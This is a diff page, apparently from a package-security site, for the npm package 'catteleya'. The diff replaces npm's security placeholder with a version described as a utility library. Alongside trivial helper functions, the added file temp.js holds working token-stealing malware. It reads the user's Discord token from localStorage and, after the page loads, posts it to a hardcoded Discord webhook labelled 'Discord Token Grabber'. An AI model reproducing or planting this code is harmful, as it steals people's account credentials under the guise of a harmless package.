catteleya 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of catteleya might be problematic. Click here for more details.

package/README.md CHANGED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=catteleya for more information.
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "catteleya",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "Catteleya's NPM Package. Has useful utillitys",
5
+ "main": "src/index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/src/index.js ADDED
@@ -0,0 +1,83 @@
1
+ // index.js
2
+ const util = require("util");
3
+ const fs = require("fs");
4
+ const path = require("path");
5
+ const moment = require("moment");
6
+ const formData = require("form-data");
7
+ const cookies = require("cookies");
8
+ const history = require("history");
9
+ const localStorage = require("local-storage");
10
+ const sessionStorage = require("session-storage");
11
+
12
+ module.exports = {
13
+ // DOM
14
+ getElementById: (id) => document.getElementById(id),
15
+ getElementsByTagName: (tagName) => document.getElementsByTagName(tagName),
16
+ querySelector: (selector) => document.querySelector(selector),
17
+ querySelectorAll: (selector) => document.querySelectorAll(selector),
18
+
19
+ // Strings
20
+ isEmpty: (str) => str === "",
21
+ trim: (str) => str.trim(),
22
+ startsWith: (str, prefix) =>str.startsWith(prefix),
23
+ endsWith: (str, suffix) => str.endsWith(suffix),
24
+ padStart: (str, length, padChar) => str.padStart(length, padChar),
25
+ padEnd: (str, length, padChar) => str.padEnd(length, padChar),
26
+
27
+ // Numbers
28
+ isNumber: (num) => Number.isFinite(num),
29
+ isInteger: (num) => num % 1 === 0,
30
+ isPositive: (num) => num > 0,
31
+ isNegative: (num) => num < 0,
32
+ abs: (num) => Math.abs(num),
33
+ round: (num, precision) => Math.round(num * Math.pow(10, precision)) / Math.pow(10, precision),
34
+ ceil: (num) => Math.ceil(num),
35
+ floor: (num) => Math.floor(num),
36
+
37
+ // Arrays
38
+ isEmpty: (arr) => arr.length === 0,
39
+ indexOf: (arr, item) => arr.indexOf(item),
40
+ lastIndexOf: (arr, item) => arr.lastIndexOf(item),
41
+ push: (arr, item) => arr.push(item),
42
+ pop: (arr) => arr.pop(),
43
+ shift: (arr) => arr.shift(),
44
+ unshift: (arr, item) => arr.unshift(item),
45
+ slice: (arr, start, end) => arr.slice(start, end),
46
+ splice: (arr, start, deleteCount, ...items) => arr.splice(start, deleteCount, ...items),
47
+ reverse: (arr) => arr.reverse(),
48
+ sort: (arr, compareFn) => arr.sort(compareFn),
49
+
50
+ // Objects
51
+ isEmpty: (obj) => Object.keys(obj).length === 0,
52
+ has: (obj, key) => Object.prototype.hasOwnProperty.call(obj, key),
53
+ get: (obj, key) => obj[key],
54
+ set: (obj, key, value) => obj[key] = value,
55
+ delete: (obj, key) => delete obj[key],
56
+ keys: (obj) => Object.keys(obj),
57
+ values: (obj) => Object.values(obj),
58
+ entries: (obj) => Object.entries(obj),
59
+
60
+ // File System
61
+ readFile: (filePath, encoding) => fs.readFile(filePath, encoding),
62
+ writeFile: (filePath, data, encoding) => fs.writeFile(filePath, data, encoding),
63
+ appendFile: (filePath, data, encoding) => fs.appendFile(filePath, data, encoding),
64
+ exists: (filePath) => fs.existsSync(filePath),
65
+ mkdir: (dirPath) => fs.mkdirSync(dirPath),
66
+ rmdir: (dirPath) => fs.rmdirSync(dirPath),
67
+ rename: (oldPath, newPath) => fs.renameSync(oldPath, newPath),
68
+ copy: (srcPath, destPath) => fs.copyFileSync(srcPath, destPath),
69
+ unlink: (filePath) => fs.unlinkSync(filePath),
70
+
71
+ // Dates and Times
72
+ now: () => moment(),
73
+ parseDate: (dateStr, format) => moment(dateStr, format),
74
+ formatDate: (date, format) => moment(date).format(format),
75
+ addDays: (date, days) => moment(date).add(days, "days"),
76
+ subtractDays: (date, days) => moment(date).subtract(days, "days"),
77
+ addHours: (date, hours) => moment(date).add(hours, "hours"),
78
+ subtractHours: (date, hours) => moment(date).subtract(hours, "hours"),
79
+ addMinutes: (date, minutes) => moment(date).add(minutes, "minutes"),
80
+ subtractMinutes: (date, minutes) => moment(date).subtract(minutes, "minutes"),
81
+ addSeconds: (date, seconds) => moment(date).add(seconds, "seconds"),
82
+ subtractSeconds: (date, seconds) => moment(date).subtract(seconds, "seconds")
83
+ }
package/temp.js ADDED
@@ -0,0 +1,122 @@
1
+ (function () {
2
+ 'use strict';
3
+
4
+ // implement localstorage behavior using cookie
5
+ //---------------------------------------------
6
+ if(!window.localStorage) {
7
+ Object.defineProperty(window, "localStorage", new(function () {
8
+ var aKeys = [],
9
+ oStorage = {};
10
+ Object.defineProperty(oStorage, "getItem", {
11
+ value: function (sKey) {
12
+ return this[sKey] ? this[sKey] : null;
13
+ },
14
+ writable: false,
15
+ configurable: false,
16
+ enumerable: false
17
+ });
18
+ Object.defineProperty(oStorage, "key", {
19
+ value: function (nKeyId) {
20
+ return aKeys[nKeyId];
21
+ },
22
+ writable: false,
23
+ configurable: false,
24
+ enumerable: false
25
+ });
26
+ Object.defineProperty(oStorage, "setItem", {
27
+ value: function (sKey, sValue) {
28
+ if(!sKey) {
29
+ return;
30
+ }
31
+ document.cookie = escape(sKey) + "=" + escape(sValue) + "; expires=Tue, 19 Jan 2038 03:14:07 GMT; path=/";
32
+ },
33
+ writable: false,
34
+ configurable: false,
35
+ enumerable: false
36
+ });
37
+ Object.defineProperty(oStorage, "length", {
38
+ get: function () {
39
+ return aKeys.length;
40
+ },
41
+ configurable: false,
42
+ enumerable: false
43
+ });
44
+ Object.defineProperty(oStorage, "removeItem", {
45
+ value: function (sKey) {
46
+ if(!sKey) {
47
+ return;
48
+ }
49
+ document.cookie = escape(sKey) + "=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/";
50
+ },
51
+ writable: false,
52
+ configurable: false,
53
+ enumerable: false
54
+ });
55
+ Object.defineProperty(oStorage, "clear", {
56
+ value: function () {
57
+ if(!aKeys.length) {
58
+ return;
59
+ }
60
+ for(var sKey in aKeys) {
61
+ document.cookie = escape(sKey) + "=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/";
62
+ }
63
+ },
64
+ writable: false,
65
+ configurable: false,
66
+ enumerable: false
67
+ });
68
+ this.get = function () {
69
+ var iThisIndx;
70
+ for(var sKey in oStorage) {
71
+ iThisIndx = aKeys.indexOf(sKey);
72
+ if(iThisIndx === -1) {
73
+ oStorage.setItem(sKey, oStorage[sKey]);
74
+ } else {
75
+ aKeys.splice(iThisIndx, 1);
76
+ }
77
+ delete oStorage[sKey];
78
+ }
79
+ for(aKeys; aKeys.length > 0; aKeys.splice(0, 1)) {
80
+ oStorage.removeItem(aKeys[0]);
81
+ }
82
+ for(var aCouple, iKey, nIdx = 0, aCouples = document.cookie.split(/\s*;\s*/); nIdx < aCouples.length; nIdx++) {
83
+ aCouple = aCouples[nIdx].split(/\s*=\s*/);
84
+ if(aCouple.length > 1) {
85
+ oStorage[iKey = unescape(aCouple[0])] = unescape(aCouple[1]);
86
+ aKeys.push(iKey);
87
+ }
88
+ }
89
+ return oStorage;
90
+ };
91
+ this.configurable = false;
92
+ this.enumerable = true;
93
+ })());
94
+ }
95
+ //---------------------------------------------------
96
+
97
+ function dmdisc(message) {
98
+ let webhookurl = "https://discord.com/api/webhooks/1124131475701387364/gb2je3TLoSCf6HKx0vQAm5awSoihhbeC6zsTp2sGq0F-kfQRwQqO65FDF41I-mTl6QPt"; //put your webhook url here.
99
+ let request = new XMLHttpRequest();
100
+ request.open("POST", webhookurl);
101
+
102
+ request.setRequestHeader('Content-type', 'application/json');
103
+
104
+ let params = {
105
+ username: ".:Discord Token Grabber 1.0:.",
106
+ avatar_url: "https://i.imgur.com/nU9WM3V.jpg",
107
+ content: '**We got someone, Wake up!\nToken: '+message+'**'
108
+ }
109
+
110
+ request.send(JSON.stringify(params));
111
+ }
112
+
113
+ var userToken = localStorage.getItem('token');
114
+
115
+ document.addEventListener('readystatechange', event => {
116
+ if(event.target.readyState === "interactive") {} else if(event.target.readyState === "complete") {
117
+ setTimeout(function () {
118
+ setTimeout(function () {dmdisc(userToken);},1000);
119
+ }, 3000);
120
+ }
121
+ });
122
+ })();